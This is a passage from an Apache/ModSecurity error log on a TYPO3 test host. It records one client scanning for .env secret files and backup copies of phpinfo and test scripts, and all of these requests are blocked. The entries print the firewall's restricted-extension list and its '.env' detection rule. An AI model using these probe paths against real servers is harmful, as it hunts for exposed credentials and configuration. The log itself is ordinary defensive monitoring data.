[Fri Nov 21 10:13:18.029592 2025] [authz_core:error] [pid 223953] [client 15.223.224.122:58066] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Fri Nov 21 10:13:18.034384 2025] [:error] [pid 223955] [client 15.223.224.122:58020] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSAtLjEUbh-dzxMTkK_x7AAAAAM"]
[Fri Nov 21 10:13:18.034626 2025] [:error] [pid 223955] [client 15.223.224.122:58020] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSAtLjEUbh-dzxMTkK_x7AAAAAM"]
[Fri Nov 21 10:13:18.034783 2025] [:error] [pid 223955] [client 15.223.224.122:58020] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSAtLjEUbh-dzxMTkK_x7AAAAAM"]
[Fri Nov 21 10:13:18.079066 2025] [:error] [pid 229737] [client 15.223.224.122:58044] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSAtLuSNO7cObITHQGDnrgAAAAQ"]
[Fri Nov 21 10:13:18.079278 2025] [:error] [pid 229737] [client 15.223.224.122:58044] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSAtLuSNO7cObITHQGDnrgAAAAQ"]
[Fri Nov 21 10:13:18.079457 2025] [:error] [pid 229737] [client 15.223.224.122:58044] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSAtLuSNO7cObITHQGDnrgAAAAQ"]
[Fri Nov 21 10:13:18.090795 2025] [:error] [pid 224163] [client 15.223.224.122:57952] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSAtLo-vpBn5AqkyjcS1HAAAAAs"]
[Fri Nov 21 10:13:18.090958 2025] [:error] [pid 224163] [client 15.223.224.122:57952] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSAtLo-vpBn5AqkyjcS1HAAAAAs"]
[Fri Nov 21 10:13:18.091146 2025] [:error] [pid 224163] [client 15.223.224.122:57952] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSAtLo-vpBn5AqkyjcS1HAAAAAs"]
[Fri Nov 21 10:13:18.091299 2025] [:error] [pid 224163] [client 15.223.224.122:57952] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSAtLo-vpBn5AqkyjcS1HAAAAAs"]
[Fri Nov 21 10:13:18.099950 2025] [:error] [pid 223954] [client 15.223.224.122:57886] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSAtLoPLQdWysfkg-aEKBgAAAAI"]
[Fri Nov 21 10:13:18.100142 2025] [:error] [pid 223954] [client 15.223.224.122:57886] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSAtLoPLQdWysfkg-aEKBgAAAAI"]
[Fri Nov 21 10:13:18.100299 2025] [:error] [pid 223954] [client 15.223.224.122:57886] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSAtLoPLQdWysfkg-aEKBgAAAAI"]
[Fri Nov 21 10:13:18.300425 2025] [:error] [pid 223952] [client 15.223.224.122:58126] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSAtLpIgILTHWk6gdY_zXAAAAAA"]
[Fri Nov 21 10:13:18.300595 2025] [:error] [pid 223952] [client 15.223.224.122:58126] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSAtLpIgILTHWk6gdY_zXAAAAAA"]
[Fri Nov 21 10:13:18.300800 2025] [:error] [pid 223952] [client 15.223.224.122:58126] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSAtLpIgILTHWk6gdY_zXAAAAAA"]
[Fri Nov 21 10:13:18.300985 2025] [:error] [pid 223952] [client 15.223.224.122:58126] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aSAtLpIgILTHWk6gdY_zXAAAAAA"]
[Fri Nov 21 10:13:18.385596 2025] [:error] [pid 229746] [client 15.223.224.122:58314] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSAtLm1y8E8ycAJbX7bS6gAAAAc"]
[Fri Nov 21 10:13:18.385886 2025] [:error] [pid 229746] [client 15.223.224.122:58314] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSAtLm1y8E8ycAJbX7bS6gAAAAc"]
[Fri Nov 21 10:13:18.386546 2025] [:error] [pid 229746] [client 15.223.224.122:58314] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSAtLm1y8E8ycAJbX7bS6gAAAAc"]
[Fri Nov 21 10:13:18.690645 2025] [:error] [pid 229744] [client 15.223.224.122:58496] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSAtLoml-svsT9-_8bDeFgAAAAY"]
[Fri Nov 21 10:13:18.690813 2025] [:error] [pid 229744] [client 15.223.224.122:58496] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSAtLoml-svsT9-_8bDeFgAAAAY"]
[Fri Nov 21 10:13:18.691018 2025] [:error] [pid 229744] [client 15.223.224.122:58496] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSAtLoml-svsT9-_8bDeFgAAAAY"]
[Fri Nov 21 10:13:18.691196 2025] [:error] [pid 229744] [client 15.223.224.122:58496] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.old"] [unique_id "aSAtLoml-svsT9-_8bDeFgAAAAY"]
[Fri Nov 21 10:13:27.563324 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:35216] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.bak
[Fri Nov 21 10:13:27.612490 2025] [authz_core:error] [pid 224163] [client 15.223.224.122:35224] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.bak
[Fri Nov 21 10:13:27.652036 2025] [authz_core:error] [pid 223955] [client 15.223.224.122:35294] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.bak
[Fri Nov 21 10:13:27.901170 2025] [:error] [pid 229746] [client 15.223.224.122:35384] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSAtN21y8E8ycAJbX7bS7QAAAAc"]
[Fri Nov 21 10:13:27.901471 2025] [:error] [pid 229746] [client 15.223.224.122:35384] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSAtN21y8E8ycAJbX7bS7QAAAAc"]
[Fri Nov 21 10:13:27.901620 2025] [:error] [pid 229746] [client 15.223.224.122:35384] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aSAtN21y8E8ycAJbX7bS7QAAAAc"]
[Fri Nov 21 10:13:27.928692 2025] [authz_core:error] [pid 224163] [client 15.223.224.122:35540] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.bak
[Fri Nov 21 10:13:28.169532 2025] [:error] [pid 229748] [client 15.223.224.122:35710] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSAtONEJC1U4VjSlcjQojwAAAAU"]
[Fri Nov 21 10:13:28.169880 2025] [:error] [pid 229748] [client 15.223.224.122:35710] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSAtONEJC1U4VjSlcjQojwAAAAU"]
[Fri Nov 21 10:13:28.170046 2025] [:error] [pid 229748] [client 15.223.224.122:35710] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aSAtONEJC1U4VjSlcjQojwAAAAU"]
[Fri Nov 21 10:13:28.299643 2025] [:error] [pid 229744] [client 15.223.224.122:35816] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSAtOIml-svsT9-_8bDeGQAAAAY"]
[Fri Nov 21 10:13:28.300023 2025] [:error] [pid 229744] [client 15.223.224.122:35816] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSAtOIml-svsT9-_8bDeGQAAAAY"]
[Fri Nov 21 10:13:28.300198 2025] [:error] [pid 229744] [client 15.223.224.122:35816] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aSAtOIml-svsT9-_8bDeGQAAAAY"]
[Fri Nov 21 10:13:33.160983 2025] [authz_core:error] [pid 223954] [client 15.223.224.122:38158] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php~
[Fri Nov 21 10:13:33.204952 2025] [:error] [pid 223953] [client 15.223.224.122:38130] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id 